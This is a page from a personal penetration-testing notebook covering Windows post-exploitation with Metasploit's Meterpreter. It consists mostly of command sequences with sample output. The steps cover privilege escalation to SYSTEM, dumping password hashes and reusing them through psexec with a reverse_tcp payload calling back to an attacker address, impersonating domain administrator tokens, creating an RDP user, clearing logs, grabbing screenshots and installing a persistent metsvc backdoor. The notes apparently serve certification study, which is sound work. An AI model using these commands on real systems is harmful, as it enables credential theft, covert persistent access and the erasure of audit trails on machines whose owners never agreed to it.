refabr1k's Pentest Notebook
  • refabr1k's Pentest Notebook
  • Steganography
  • Kali USB with persistence memory
  • useful tools
  • Understanding ICACLS permissions
  • INFO GATHERING
    • Port Knocking
    • 22 tcp - SSH
      • SSH Tunneling
    • 25 tcp - SMTP
    • 53 tcp/udp - DNS
    • 88 tcp - Kerberos
    • 161 udp - SNMP
    • 445 tcp - SMB
    • 1098,1099 tcp - Java RMI
    • 8009 tcp - AJP
    • 5901,5902 tcp - VNC
  • Web
    • XSS cookie stealing
    • PHP
    • Webdav
    • Wordpress
    • XML RPC
    • SQL Injection
    • SSRF
  • EXPLOITATION
    • File Transfers
    • Buffer Overflow
    • Bruteforce
      • Hashcat
      • Ophcrack (rainbow tables)
      • John The Ripper
    • PHP rce
    • Compiling
    • msfvenom
    • Reverse shell
    • Using ENV to escape Bad Characters
    • shellshock
    • Ncat Persistent Backdoor
  • PRIVESC - LINUX
    • Basic checks
    • Upgrading Shells
    • SUID
  • Privesc - Windows
    • Basic checks / powershell
    • Privesc Openings
    • LonelyPotato - SeImpersonatePrivilege
    • Enable RDP @ Firewall
    • NTLM (Pass The Hash)
  • Windows
    • NTDS.dit
    • Responder / SMB Relay
    • Attacking AD
      • AD Hacking Lab Setup
  • Metasploit
    • Basic Usage
    • Meterpreter
      • Pivoting
      • Windows Post Exploitation
  • Unsorted
    • other notes
  • eLearnSecurity eJPT
    • eJPT notes
  • OSWP
  • Getting started
  • WEP Attacks
    • WEP Attack (OPEN) - Clients connected
    • WEP Attack (OPEN) - Clientless
    • WEP Attack (SKA)
  • WPA/WPA2 Attacks
  • Scripts
    • get port from nmap
    • Curl response
    • ping sweep
    • iptables-counter.sh
    • (DNS) zonetransfer_check.sh
    • (DNS) dns-rev-brute.sh
    • (DNS) dns-fwd-brute.sh
    • (SMB) vuln-scan.sh
    • (SMB) samba-checker.sh
    • (SMTP) vrfy.py
    • (SNMP) mib-check.sh
  • Zeroday vulnerabilities explained
    • 2020-12 Solarwind supply chain
Powered by GitBook
On this page
  • Hashdump and Pass The Hash
  • Stealing Tokens (Incognito)
  • Enable RDP and create User
  • Clearing logs
  • Screen Capture
  • Backdoor

Was this helpful?

  1. Metasploit
  2. Meterpreter

Windows Post Exploitation

#Meterpreter privesc
meterpreter > use priv
meterpreter > getsystem -h
meterpreter > getsystem
meterpreter > getuid

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > background
msf exploit(ms10_002_aurora) > use exploit/windows/local/
msf exploit(ms10_002_aurora) > use exploit/windows/local/ms10_015_kitrap0d

msf exploit(ms10_015_kitrap0d) > set SESSION 1

msf exploit(ms10_015_kitrap0d) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_015_kitrap0d) > set LHOST 192.168.1.161

msf exploit(ms10_015_kitrap0d) > set LPORT 4443

msf exploit(ms10_015_kitrap0d) > show options
msf exploit(ms10_015_kitrap0d) > exploit
meterpreter > getuid

#Server username: NT AUTHORITY\SYSTEM

Hashdump and Pass The Hash

meterpreter > run post/windows/gather/hashdump 
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > show options
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell

Stealing Tokens (Incognito)

meterpreter > use incognito
meterpreter > help
meterpreter > list_tokens -u
#Delegation Tokens Available
#========================================
#NT AUTHORITY\LOCAL SERVICE
#NT AUTHORITY\NETWORK SERVICE
#NT AUTHORITY\SYSTEM
#SNEAKS.IN\Administrator

meterpreter > impersonate_token SNEAKS.IN\\Administrator
#[+] Delegation token available
#[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
#Server username: SNEAKS.IN\Administrator

Enable RDP and create User

meterpreter > run getgui -h
meterpreter > run getgui -u loneferret -p password

Clearing logs

meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc

Screen Capture

meterpreter > ps
#260   Explorer.EXE         C:\WINDOWS\Explorer.EXE
meterpreter > migrate 260
meterpreter > use espia
meterpreter > screengrab 
# 
Screenshot saved to: /root/nYdRUppb.jpeg

Backdoor

msf exploit(3proxy) > exploit
meterpreter > ps
meterpreter > migrate 632
meterpreter > run metsvc -h
meterpreter > run metsvc

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
#PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
#LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
#RHOST => 192.168.1.104

msf exploit(handler) > exploit
PreviousPivotingNextother notes

Last updated 4 years ago

Was this helpful?